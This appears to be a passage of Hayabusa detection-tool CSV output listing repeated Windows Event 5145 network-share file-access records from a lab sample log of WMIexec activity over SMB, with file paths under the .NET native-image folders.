10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 
